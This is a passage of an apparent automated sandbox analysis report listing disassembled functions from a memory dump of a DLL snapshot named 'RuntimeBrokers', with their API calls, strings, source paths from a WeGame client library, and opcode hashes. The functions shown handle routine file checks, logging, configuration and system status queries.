                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?equal@directory_iterator@filesystem@ierd_tgp@@Edirectory_iterator@filesystem@ierd_tgp@@ExceptionExecute_once@std@@H_prolog3_ThrowUonce_flag@1@V012@V123@@terminate
                                        • String ID: filesystem::recursive_directory_iterator directory error
                                        • API String ID: 175330673-1223082086
                                        • Opcode ID: 6f14cb16998d8698281d1b7d49026c861dd909f52232a0ef33692d4ba8b89b33
                                        • Instruction ID: 2eb71a4b4e1fa41b6868691638cd7f7cbd31ad6502f4fb26a4df08dfef507db0
                                        • Opcode Fuzzy Hash: 6f14cb16998d8698281d1b7d49026c861dd909f52232a0ef33692d4ba8b89b33
                                        • Instruction Fuzzy Hash: 0A41BCB2D01618ABCF04DFA4D444BDDB7F5AF45328F204299E5217BA80CB35AD05CBD4
                                        Function 6C0BF8BA Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?string@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,: ",00000003,00000000), ref: 6C0BF94B
                                        • ?string@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,, ",00000003,00000000), ref: 6C0BF9A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?string@path@filesystem@ierd_tgp@@D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@
                                        • String ID: , "$: "$Unknown exception
                                        • API String ID: 1973100904-2574047376
                                        • Opcode ID: 642600a70014095fe0ccb3d85eeace45873357144813702b388bdee2861ce635
                                        • Instruction ID: bbcfb975b96a9ad1437ecb3395833fb58b50b6dad4c0431a561e742b8fa58394
                                        • Opcode Fuzzy Hash: 642600a70014095fe0ccb3d85eeace45873357144813702b388bdee2861ce635
                                        • Instruction Fuzzy Hash: 7241A279A14344DFE728CF94D550BDAB3F9AB04718F10051DE0436BA81DB75B94ACBA2
                                        Function 6C0C20A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0C20A7
                                          • Part of subcall function 6C0C2011: __EH_prolog3_GS.LIBCMT ref: 6C0C2018
                                          • Part of subcall function 6C0C1745: __EH_prolog3.LIBCMT ref: 6C0C174C
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 6C0C20EB
                                        • PathFileExistsW.SHLWAPI(00000000,?,00000000,\dbData64.dll,?,?), ref: 6C0C2131
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ExistsFileH_prolog3_Path$H_prolog3
                                        • String ID: \dbData.dll$\dbData64.dll
                                        • API String ID: 1018888864-3053325790
                                        • Opcode ID: 80fe853b4ac14764975e273f9de3adb2460fee915eeb5e0e805034881f4904ba
                                        • Instruction ID: d98111b2a56f7ac388dd300b284442c5c997b1f93d2f593a07c2ff5070f8a017
                                        • Opcode Fuzzy Hash: 80fe853b4ac14764975e273f9de3adb2460fee915eeb5e0e805034881f4904ba
                                        • Instruction Fuzzy Hash: A43158B4E05348DAEB10CFB0C888BCDBBF4AF15358F64125DD911A7AD2D7389A89CB11
                                        Function 6C0C21B2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0C21B9
                                          • Part of subcall function 6C0C2011: __EH_prolog3_GS.LIBCMT ref: 6C0C2018
                                          • Part of subcall function 6C0C1745: __EH_prolog3.LIBCMT ref: 6C0C174C
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 6C0C21FD
                                        • PathFileExistsW.SHLWAPI(00000000,?,00000000,\wkData64.dll,?,?), ref: 6C0C2243
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ExistsFileH_prolog3_Path$H_prolog3
                                        • String ID: \wkData.dll$\wkData64.dll
                                        • API String ID: 1018888864-160068528
                                        • Opcode ID: 51eaa62b5952f99700a7d966848cb7e468493fc24449788ca3a57998f7132ef3
                                        • Instruction ID: d018106fb219af57eeb3034e4a954678eb428c906acf59fda7294c1d9252b190
                                        • Opcode Fuzzy Hash: 51eaa62b5952f99700a7d966848cb7e468493fc24449788ca3a57998f7132ef3
                                        • Instruction Fuzzy Hash: A33158B5D05348EEEB20CFB4C888BCDBBF4AF14318F64125DD521A7AD2D7389A48CA11
                                        Function 6C10AC10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                          • Part of subcall function 6C10A272: __EH_prolog3_GS.LIBCMT ref: 6C10A279
                                          • Part of subcall function 6C10A272: ?is_directory@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,0000003C,6C10AB09,00000005), ref: 6C10A2C6
                                          • Part of subcall function 6C10A272: ?CopyDir@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@0@Z.COMMON(?,?,?,?,0000003C,6C10AB09,00000005), ref: 6C10A2D9
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000003), ref: 6C10AB3C
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003), ref: 6C10AB43
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp,000001F9,6C3CE62F), ref: 6C10AB80
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?remove@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,00000005), ref: 6C10ABEF
                                        Strings
                                        • [ExptFileProcesser] DumpDataFiles: data_path = %s, failed(%d), xrefs: 6C10AB93
                                        • d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp, xrefs: 6C10AB67
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$?get_log_instance@base@@?is_directory@filesystem@ierd_tgp@@?remove@filesystem@ierd_tgp@@?u16to8@common@ierd_tgp@@CopyD@2@@4@@D@std@@Dir@ErrorH_prolog3H_prolog3_catch_LastLogger@1@Sys_wrapper@common@ierd_tgp@@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_Verror_code@std@@@Vpath@12@Vpath@12@@Vpath@filesystem@3@0@W@2@@std@@W@std@@memmove
                                        • String ID: [ExptFileProcesser] DumpDataFiles: data_path = %s, failed(%d)$d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp
                                        • API String ID: 1082621659-1985600348
                                        • Opcode ID: 83a5c907ffaed476e364c397092dde762afa5ff896aa737ed4650963a1d7034c
                                        • Instruction ID: 604559684fe9bd0f35e9d54811e88cf179bcd3a4157caca645ec65ee9825b896
                                        • Opcode Fuzzy Hash: 83a5c907ffaed476e364c397092dde762afa5ff896aa737ed4650963a1d7034c
                                        • Instruction Fuzzy Hash: 0C318E71D01248DBDF00DFA8C991BEEBBB5AF15208F20809DD51477642DB35AB4ACF92
                                        Function 6C12E0C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C12E0CE
                                        • GetModuleHandleA.KERNEL32(common.dll,?dyn_comp_mgr_find_component@@YA?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@common@ierd_tgp@@@Z,00000018,6C12E327,6C439534,6C439584,00000054), ref: 6C12E0DD
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C12E0E4
                                          • Part of subcall function 6C12E1B1: __RTDynamicCast.VCRUNTIME140(00000054,00000000,6C4341A8,6C435E4C,00000000,B33B76E5,?,6C439510,00000001,?,00000054,6C31DC4A,000000FF,?,6C12E282,00000054), ref: 6C12E1ED
                                        Strings
                                        • ?dyn_comp_mgr_find_component@@YA?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@common@ierd_tgp@@@Z, xrefs: 6C12E0D3
                                        • common.dll, xrefs: 6C12E0D8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AddressCastDynamicH_prolog3HandleModuleProc
                                        • String ID: ?dyn_comp_mgr_find_component@@YA?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@common@ierd_tgp@@@Z$common.dll
                                        • API String ID: 3452073653-2503669440
                                        • Opcode ID: ae9764655eaf537de925bc4fb7bb90931a7a92190085bc94c1bbc7999b5727ff
                                        • Instruction ID: 7c6cea032ede90adc42f9b00d82c5eca4a7b6b1a2c7ca9de7dc891d0eaeefe3a
                                        • Opcode Fuzzy Hash: ae9764655eaf537de925bc4fb7bb90931a7a92190085bc94c1bbc7999b5727ff
                                        • Instruction Fuzzy Hash: D6318E34D0524ADBDF08CFA4C514BEEBBF4AF56315F2081ADD015A7690DB78AB09CB91
                                        Function 6C0B7EC2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0B7EC9
                                          • Part of subcall function 6C0BEF41: __EH_prolog3_GS.LIBCMT ref: 6C0BEF4B
                                          • Part of subcall function 6C0BEF41: ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008), ref: 6C0BEF8B
                                          • Part of subcall function 6C0BEF41: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP140(?,?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008), ref: 6C0BEFA1
                                          • Part of subcall function 6C0BEF41: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008,6C0BCC88), ref: 6C0BEFB8
                                          • Part of subcall function 6C0BEF41: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008,6C0BCC88), ref: 6C0BF00F
                                        Strings
                                        • void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_, xrefs: 6C0B7F8E
                                        • " to data failed, xrefs: 6C0B7F5D
                                        • d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 6C0B7F89
                                        • conversion of type ", xrefs: 6C0B7F3B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$H_prolog3_$??1?$basic_ios@??6?$basic_ostream@?imbue@?$basic_ios@Bios_base@std@@V01@V32@@Vlocale@2@
                                        • String ID: " to data failed$conversion of type "$d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp$void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_
                                        • API String ID: 284028645-2278185983
                                        • Opcode ID: 448eba7d536e34b83e53f59be6509d1bcb5614e7997b77db9dc105fd46bf8829
                                        • Instruction ID: 1389ad1864661fe2ea1552fd7d3d6909588c835b2aedd42bf200b08f480db091
                                        • Opcode Fuzzy Hash: 448eba7d536e34b83e53f59be6509d1bcb5614e7997b77db9dc105fd46bf8829
                                        • Instruction Fuzzy Hash: A7215E71C04298AADF11D7F4C848FCEBBF85F15218F548588E055B7AC2DB79AB09CBA1
                                        Function 6C0B7FED Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0B7FF4
                                          • Part of subcall function 6C0BF01F: __EH_prolog3_GS.LIBCMT ref: 6C0BF029
                                          • Part of subcall function 6C0BF01F: ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?,00000002,00000001,000000C4,6C0B800F,?,?,0000007C,6C0B7FE5,?,?,?,?,?,00000008), ref: 6C0BF069
                                          • Part of subcall function 6C0BF01F: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,00000001,?,00000002,00000001,000000C4,6C0B800F,?,?,0000007C,6C0B7FE5,?), ref: 6C0BF082
                                          • Part of subcall function 6C0BF01F: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000002,00000001,000000C4,6C0B800F,?,?,0000007C,6C0B7FE5,?,?,?,?,?,00000008,6C0BCB5E), ref: 6C0BF099
                                          • Part of subcall function 6C0BF01F: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000002,00000001,000000C4,6C0B800F,?,?,0000007C,6C0B7FE5,?,?,?,?,?,00000008,6C0BCB5E), ref: 6C0BF0F0
                                        Strings
                                        • void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_, xrefs: 6C0B80B9
                                        • " to data failed, xrefs: 6C0B8088
                                        • d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 6C0B80B4
                                        • conversion of type ", xrefs: 6C0B8066
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$H_prolog3_$??1?$basic_ios@??6?$basic_ostream@?imbue@?$basic_ios@Bios_base@std@@V01@_V32@@Vlocale@2@
                                        • String ID: " to data failed$conversion of type "$d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp$void __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_
                                        • API String ID: 872031544-2278185983
                                        • Opcode ID: 5c6ada987162e6dad3bdbe66d0e03a6b35716a0f6592508c29b02decf806577a
                                        • Instruction ID: 76ec08b0362cb2e6d4ba1463e63760fed140bb8eac2125ecb818d8ef9caf241c
                                        • Opcode Fuzzy Hash: 5c6ada987162e6dad3bdbe66d0e03a6b35716a0f6592508c29b02decf806577a
                                        • Instruction Fuzzy Hash: C8218071C04288AADF11D7F4C848BCE7BF85F15358F548588E015B7A82DB79AB09CBA1
                                        Function 6C0F795E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0F7965
                                          • Part of subcall function 6C0B9A0E: __EH_prolog3.LIBCMT ref: 6C0B9A15
                                        • ?is_profile_on@common@ierd_tgp@@YA_NXZ.COMMON(00000040), ref: 6C0F797A
                                        • ?enable_profile_on@common@ierd_tgp@@YAX_N@Z.COMMON(?), ref: 6C0F79F6
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                        • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000001,?,?,?,initial.profile.on,00000012,00000040), ref: 6C0F79B9
                                          • Part of subcall function 6C0E6FB1: __EH_prolog3_catch_GS.LIBCMT ref: 6C0E6FBB
                                          • Part of subcall function 6C0E6FB1: ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6C0E7020
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$?enable_profile_on@common@ierd_tgp@@?get_cfg_by_path@common@ierd_tgp@@?is_profile_on@common@ierd_tgp@@?split_path@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3H_prolog3_H_prolog3_catch_U?$less@V12@V34@1@V?$basic_ptree@memmove
                                        • String ID: initial.profile.on
                                        • API String ID: 2365034594-3868740645
                                        • Opcode ID: e9295d52a14ac8be8576c76f7ad7b6aca088b1f643a7638189d2d63b4412be9f
                                        • Instruction ID: 2c354d7b93590e68c5414ca0c9b194422b7627c7df5db047ef01db2b123abbfd
                                        • Opcode Fuzzy Hash: e9295d52a14ac8be8576c76f7ad7b6aca088b1f643a7638189d2d63b4412be9f
                                        • Instruction Fuzzy Hash: 1611AF70C042099EDF01DFE4C881BEDBBF0AF15318F240169D561B76C2DBB9568ADB62
                                        Function 6C152C34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C152C3B
                                        • GetSystemPowerStatus.KERNEL32(?), ref: 6C152C4C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C152C56
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C152C7A
                                        • [Sys_wrapper]ACLineStatus:{},BatteryFlag:{}, xrefs: 6C152C96
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_Logger@1@PowerStatusSystem
                                        • String ID: [Sys_wrapper]ACLineStatus:{},BatteryFlag:{}$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 122112040-3711229193
                                        • Opcode ID: c80cf57c99b21b4b250695b4a40a4b79d605e320d5b749754c5c14b2301c46fa
                                        • Instruction ID: e303e18f77d9e435cb442e73be269b9c9903e3c9fb729e3da56aec77d95c892b
                                        • Opcode Fuzzy Hash: c80cf57c99b21b4b250695b4a40a4b79d605e320d5b749754c5c14b2301c46fa
                                        • Instruction Fuzzy Hash: 6901F172E00705ABEF14DBB0C815FEEB3645F50314F5042589121BBAC0DB68AA4ECB81
                                        Function 6C14EF5F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C14EF66
                                        • GetSystemTimes.KERNEL32(6C43A3E4,6C43A3EC,6C43A3F4,00000050), ref: 6C14EF7C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(6C43A3E4,6C43A3EC,6C43A3F4,00000050), ref: 6C14EF85
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
